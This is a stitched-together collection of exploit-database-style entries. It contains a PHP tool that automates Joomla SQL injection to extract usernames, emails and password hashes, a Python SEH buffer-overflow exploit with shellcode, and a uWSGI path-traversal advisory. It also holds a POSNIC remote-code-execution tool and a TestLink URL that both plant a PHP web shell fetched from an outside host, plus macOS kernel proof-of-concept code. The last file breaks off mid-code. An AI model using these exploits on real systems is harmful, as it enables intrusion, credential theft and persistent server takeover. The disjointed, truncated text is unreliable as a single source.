http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
It will dump PHP web shell in base directory with name ica.php.
--==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
--==[[Love to]]==--
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
<?php
session_start();
error_reporting(0);
set_time_limit(0);
/* Coded By Manish At Indishell Lab*/
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #333333;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms">--==[[ Mannu ]]==--</font><br><font color=#ff9933 size=3 face="comic sans ms">--==[[ Joomla </font><font color=white size=3 face="comic sans ms">SQL Injection exploiter By Team </font><font color=green size=3 face="comic sans ms"> INDIShEll]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
Hackuin,Alicks,mike waals<br>cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash<br>
<font color=white>--==[[Love to]]==--</font><br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)<br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table>
';
function unhex($hex){
for($i=0;$i<strlen($hex);$i+=2)
$str .= chr(hexdec(substr($hex,$i,2)));
return $str;
}
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
?>
<div align=center>
<img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-cool21.gif">
<font size=4 color=white face="comic sans ms">--==[[ code for India ]]==-- </font>
<img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-flag010.gif">
<br><br>
<form method=post>
<input type=input name=in value=target>
<input type=submit name=sm value="Exploit it">
</form>
<?php
if(isset($_POST['sm']))
{
$target=trim($_POST['in']);
$inject=$target.'/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=';
$payload='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,hex(table_name),0x7e7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1)))=1';
$final_url=$inject.$payload;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$def=trim($de1[0]);
$table_name=unhex($def);
echo 'Table names used for grabbing database table prefix ->'.$table_name;
echo '<br>';
$prefix=explode('_',$table_name);
$total_char=10;
$start=1;
$loop_end=false;
while($loop_end!=true)
{
$payload2='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'.$start.','.$total_char.'),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$payload2;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$ddd.=trim($de1[0]);
if(trim($de1[0])=='')
{
break;
$loop_end=true;
}
$i=$i+1;
$start=$start+10;
}
$username='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$username;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$user_name=trim($de1[0]);
$email='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$email;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$email=trim($de1[0]);
$dbuser='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbuser;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_user=trim($de1[0]);
$dbname='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbname;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_name=trim($de1[0]);
$dbversion='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbversion;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_version=trim($de1[0]);
if($email!='' || $user_name!='' || $ddd!='')
{
echo 'Target <a href="'.$target.'">'.$target.'</a> has been injected successfully, find username, email and password given below<br><br>';
echo '<table width=80% style="border:0px; background-color : transparent;">';
echo '<tr><td align=right width=20%>Database username is -> </td><td align=left width=80%><font color=#f9e79f>'.$db_user;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Database name is -> </td><td align=left width=80%><font color=#f9e79f>'.$db_name;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Database version is -> </td><td align=left width=80%><font color=#f9e79f>'.$db_version;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Username is -> </td><td align=left width=80%><font color=#f9e79f>'.$user_name;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Email is -> </td><td align=left width=80%><font color=#f9e79f>'.$email;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Password hash is -> </td><td align=left width=80%><font color=#f9e79f>'.$ddd;
echo '</font></td></tr></table>';
}
}
?>
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title:iSumsoft Local Buffer Overflow Vuln. 0day(SEH)
# Date: 2018.03.02
# Exploit Author: Greg Priest
# Version: iSumsoft ZIP Password Refixer Version 3.1.1
# Tested on: Windows7 x64 HUN/ENG Professional
'''
junk = "A" * 340
nSEH = "\xeb\x06\x90\x90"
SEH = "\x0C\x70\x8D\x73"
nop = "\x90" *16
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + #cmd.exe shellcode!
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
crash = junk + nSEH + SEH + nop + shellcode + "C" * 300
exploit = open('iSumsoft-exploit.txt', 'w')
exploit.write(crash)
exploit.close()
print author
print '''
#####################
#This is a PoC code!#
#####################
'''
print "[+] iSumsoft-exploit.txt ready!"
print '[+] Copy iSumsoft-exploit.txt string and paste "start from:" field!'
# Exploit Title: uWSGI PHP Plugin Directory Traversal
# Date: 01-03-2018
# Exploit Author: Marios Nicolaides - RUNESEC
# Reviewers: Simon Loizides and Nicolas Markitanis - RUNESEC
# Vendor Homepage: https://uwsgi-docs.readthedocs.io
# Affected Software: uWSGI PHP Plugin before 2.0.17
# Tested on: uWSGI 2.0.12 and 2.0.15
# CVE: CVE-2018-7490
# Category: Web Application
OVERVIEW
--------
The uWSGI PHP plugin before 2.0.17 is vulnerable to Directory Traversal when used without specifying the "php-allowed-docroot" option.
The vulnerability exists due to improper validation of the file path when requesting a resource under the DOCUMENT_ROOT directory which is specified via "php-docroot".
A remote attacker could exploit this weakness to read arbitrary files from the vulnerable system using path traversal sequences ("..%2f").
This was tested on uWSGI 2.0.12 and 2.0.15. All versions before 2.0.17 are affected.
DETAILS
-------
The documentation of uWSGI states that the php-docroot option is used to jail our php environment to a project directory (http://uwsgi-docs.readthedocs.io/en/latest/PHP.html#run-php-apps-without-a-frontend-server).
; jail our php environment to project_dir
php-docroot = %(project_dir)
During testing it was observed that uWSGI was affected by a Directory Traversal vulnerability when executed as a standalone (without a front-end web server) along with the "php-docroot" option to enforce the DOCUMENT_ROOT of the web application.
uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-docroot /home/testing/webapp/
An attacker could exploit this vulnerability by using path traversal sequences ("..%2f") to access sensitive information as demonstrated below:
http://example.runesec.com:1337/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
We noticed that when a Directory Traversal attack was performed, uWSGI was issuing the following security error:
[uwsgi-fileserve] security error: /etc/passwd is not under /home/testing/webapp or a safe path
However, the contents of the requested file (i.e., /etc/passwd) were still returned to the user.
After searching the web for possible solutions, we noticed that the "php-allowed-docroot" option was previously added to uWSGI for better security and could be used to list the allowed document roots but no further details were available (http://lists.unbit.it/pipermail/uwsgi/2011-December/003180.html).
Upon further testing, we observed that when the "php-allowed-docroot" was used instead of the "php-docroot" option, it was not affected by Directory Traversal attacks.
uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-allowed-docroot /home/testing/webapp/
After a very constructive and helpful talk with the uWSGI Project, they released an update which enforces a DOCUMENT_ROOT check when using the "php-docroot" option to prevent Directory Traversal attacks. Please see the MITIGATION section for more information.
IMPACT
------
An attacker could exploit this vulnerability to gain unauthorized read access to sensitive files located outside of the web root directory.
MITIGATION
----------
It is recommended to update to uWSGI 2.0.17 - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
REFERENCES
----------
https://blog.runesec.com/2018/03/01/uwsgi-path-traversal/
https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490
https://nvd.nist.gov/vuln/detail/CVE-2018-7490
https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
TIMELINE
--------
26 June 2017 - uWSGI Project informed about the issue
26 February 2018 - uWSGI Project released a patch
1 March 2018 - Exploit publicly disclosed
<?php
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[IndiSh3LL]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ POSNIC, PHP stock </font><font color=white size=5 face="comic sans ms"><b>management script Remote code </font><font color=green size=5 face="comic sans ms"><b>execution exploiter ]==--</font><br><font color=white size=5 face="comic sans ms">--==[[ With Love from Team Indishell]]==--</br></font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
--==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP,
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)<br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table>
';
echo '<div align=center>
<font size=4 color=white face="comic sans ms"><img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-cool21.gif"> --==[[ code for India,Hack for India,Die for India ]]==-- <img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-flag010.gif"></font>
<br>Please <a href="https://github.com/incredibleindishell/exploit-code-by-me/tree/master/POSNIC">Read it</a> before using this code.<br><br>
<form method=post>
target URL: -<input type=text name=tar>
<br><br>Attacker controled Remote MySQL host: - <input type=text name=mhost value="attacker_controlled MYSQL server IP">
<br><br>Attacker controled Remote MySQL account username: - <input type=text name=muser>
<br><br>
<input type=submit name=launch value="Chal Billu, own the shit 8-)">
</form>';
function request($lu,$payload)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec ($ch);
curl_close ($ch);
}
function shell_check($url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_NOBODY, true);
$result = curl_exec($curl);
$ret = false;
if ($result !== false) {
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 200) {
$ret = true;
}
}
curl_close($curl);
return $ret;
}
function access($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
if(isset($_POST['launch']))
{
$tar=$_POST['tar'];
$mhost=trim($_POST['mhost']);
$muser=trim($_POST['muser']);
$injecturl=$tar.'/setup_page.php';
$exploiturl=$tar.'/config.php';
/////////////////////////////////////
//here, we are injecting config file
/////////////////////////////////////
$hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL";
request($injecturl,$hex_it);
/////////////////////////////////////////
///Her we go, let's dump shell on server
////////////////////////////////////////
$code='<?php
function access($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, \'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8\');
$result[\'EXE\'] = curl_exec($ch);
curl_close($ch);
return $result[\'EXE\'];
}
$shell=access("https://raw.githubusercontent.com/incredibleindishell/Mannu-Shell/master/mannu.php");
file_put_contents("ica.php",$shell);
?>';
$post_request='2=mannu.php&3='.$code;
request($exploiturl,$post_request);
access($tar.'/mannu.php');
$shell_link=shell_check($tar.'/ica.php');
if($shell_link==True)
{
echo 'check your shell at <a href="'.$tar.'/ica.php">This link </a>';
}
}
?>
/*
* IOFireWireFamily-null-deref.c
* Brandon Azad
*
* NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop.
*
* Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip
*/
#include <IOKit/IOKitLib.h>
int main() {
int ret = 0;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOFireWireLocalNode"));
if (service == IO_OBJECT_NULL) {
ret = 1;
goto fail1;
}
io_connect_t connect;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
IOObjectRelease(service);
if (kr != KERN_SUCCESS) {
ret = 2;
goto fail1;
}
// isochChannel_Create
uint64_t args[3] = { 0, 0x100, 0x100 };
uint64_t handle = 0;
uint32_t output_count = 1;
kr = IOConnectCallMethod(connect, 57,
args, sizeof(args) / sizeof(*args), NULL, 0,
&handle, &output_count, NULL, NULL);
if (kr != KERN_SUCCESS) {
ret = 3;
goto fail2;
}
// setAsyncRef_IsochChannelForceStop
kr = IOConnectCallMethod(connect, 90,
&handle, 1, NULL, 0,
NULL, NULL, NULL, NULL);
if (kr != KERN_SUCCESS) {
ret = 4;
goto fail2;
}
fail2:
IOServiceClose(connect);
fail1:
return ret;
}
/*
* IOFireWireFamily-overflow.c
* Brandon Azad
*
* Buffer overflow reachable from IOFireWireUserClient::localConfigDirectory_Publish.
*
* Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44235.zip
*/
#include <IOKit/IOKitLib.h>
#include <stdlib.h>
#include <string.h>
int main() {
int ret = 0;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOFireWireLocalNode"));
if (service == IO_OBJECT_NULL) {
ret = 1;
goto fail1;
}
io_connect_t connect;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
IOObjectRelease(service);
if (kr != KERN_SUCCESS) {
ret = 2;
goto fail1;
}
// localConfigDirectory_Create
uint64_t directory = 0;
uint32_t output_count = 1;
kr = IOConnectCallMethod(connect, 16,
NULL, 0, NULL, 0,
&directory, &output_count, NULL, NULL);
if (kr != KERN_SUCCESS) {
ret = 3;
goto fail2;
}
// localConfigDirectory_addEntry_Buffer
uint32_t size = 0x100000;
void *buffer = malloc(size);
memset(buffer, 0xaa, size);
uint64_t addEntry_Buffer_args[6] = { directory, 0, (uint64_t)buffer, size, 0, 0 };
kr = IOConnectCallMethod(connect, 17,
addEntry_Buffer_args,
sizeof(addEntry_Buffer_args) / sizeof(*addEntry_Buffer_args),
NULL, 0,
NULL, NULL, NULL, NULL);
free(buffer);
if (kr != KERN_SUCCESS) {
ret = 4;
goto fail2;
}
// localConfigDirectory_Publish
kr = IOConnectCallMethod(connect, 21,
&directory, 1, NULL, 0,
NULL, NULL, NULL, NULL);
if (kr != KERN_SUCCESS) {
ret = 5;
goto fail2;
}
fail2:
IOServiceClose(connect);
fail1:
return ret;
}
/*
* ctl_ctloutput-leak.c
* Brandon Azad
*
* CVE-2017-13868
*
* While looking through the source code of XNU version 4570.1.46, I noticed that the function
* ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of
* sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap
* allocation to user space. Triggering this information leak requires root privileges.
*
* The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel
* control socket. The relevant code does the following:
* (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without
* specifying the M_ZERO flag to zero out the allocated bytes.
* (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data
* buffer just allocated. This copyin is supposed to completely overwrite the allocated data,
* which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is
* not checked, which means it is possible that the copyin has failed, leaving uninitialized
* data in the buffer. The copyin could fail if, for example, the program passed an unmapped
* address to getsockopt().
* (c) The code then calls the real getsockopt() implementation for this kernel control socket.
* This implementation should process the input buffer, possibly modifying it and shortening
* it, and return a result code. However, the implementation is free to assume that the
* supplied buffer has already been initialized (since theoretically it comes from user
* space), and hence several implementations don't modify the buffer at all. The NECP
* function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer
* at all.
* (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()
* calls sooptcopyout() to copy the data buffer back to user space.
*
* Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a
* controlled size to be allocated, prevent the contents of that buffer from being initialized, and
* then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped
* address. All we need to do for the copyout to succeed is remap that address between the calls to
* sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap
* data to userspace.
*
* It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the
* mean number of attempts to win the race was never more than 600, and the median was never more
* than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the
* exploit.)
*
* This program exploits this vulnerability to leak data from a kernel heap buffer of a
* user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS
* High Sierra 10.13 (build 17A365).
*
* Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44234.zip
*
*/
#if 0
if (sopt->sopt_valsize && sopt->sopt_val) {
MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, // (a) data is allocated
M_WAITOK); // without M_ZERO.
if (data == NULL)
return (ENOMEM);
/*
* 4108337 - copy user data in case the
* kernel control needs it
*/
error = sooptcopyin(sopt, data, // (b) sooptcopyin() is
sopt->sopt_valsize, sopt->sopt_valsize); // called to fill the
} // buffer; the return
len = sopt->sopt_valsize; // value is ignored.
socket_unlock(so, 0);
error = (*kctl->getopt)(kctl->kctlref, kcb->unit, // (c) The getsockopt()
kcb->userdata, sopt->sopt_name, // implementation is
data, &len); // called to process
if (data != NULL && len > sopt->sopt_valsize) // the buffer.
panic_plain("ctl_ctloutput: ctl %s returned "
"len (%lu) > sopt_valsize (%lu)\n",
kcb->kctl->name, len,
sopt->sopt_valsize);
socket_lock(so, 0);
if (error == 0) {
if (data != NULL)
error = sooptcopyout(sopt, data, len); // (d) If (c) succeeded,
else // then the data buffer
sopt->sopt_valsize = len; // is copied out to
} // userspace.
#endif
#include <errno.h>
#include <mach/mach.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>
#if __x86_64__
// ---- Header files not available on iOS ---------------------------------------------------------
#include <mach/mach_vm.h>
#include <sys/sys_domain.h>
#include <sys/kern_control.h>
#else /* __x86_64__ */
// If we're not on x86_64, then we probably don't have access to the above headers. The following
// definitions are copied directly from the macOS header files.
// ---- Definitions from mach/mach_vm.h -----------------------------------------------------------
extern
kern_return_t mach_vm_allocate
(
vm_map_t target,
mach_vm_address_t *address,
mach_vm_size_t size,
int flags
);
extern
kern_return_t mach_vm_deallocate
(
vm_map_t target,
mach_vm_address_t address,
mach_vm_size_t size
);
// ---- Definitions from sys/sys_domain.h ---------------------------------------------------------
#define SYSPROTO_CONTROL 2 /* kernel control protocol */
#define AF_SYS_CONTROL 2 /* corresponding sub address type */
// ---- Definitions from sys/kern_control.h -------------------------------------------------------
#define CTLIOCGINFO _IOWR('N', 3, struct ctl_info) /* get id from name */
#define MAX_KCTL_NAME 96
struct ctl_info {
u_int32_t ctl_id; /* Kernel Controller ID */
char ctl_name[MAX_KCTL_NAME]; /* Kernel Controller Name (a C string) */
};
struct sockaddr_ctl {
u_char sc_len; /* depends on size of bundle ID string */
u_char sc_family; /* AF_SYSTEM */
u_int16_t ss_sysaddr; /* AF_SYS_KERNCONTROL */
u_int32_t sc_id; /* Controller unique identifier */
u_int32_t sc_unit; /* Developer private unit number */
u_int32_t sc_reserved[5];
};
#endif /* __x86_64__ */
// ---- Definitions from bsd/net/necp.h -----------------------------------------------------------
#define NECP_CONTROL_NAME "com.apple.net.necp_control"
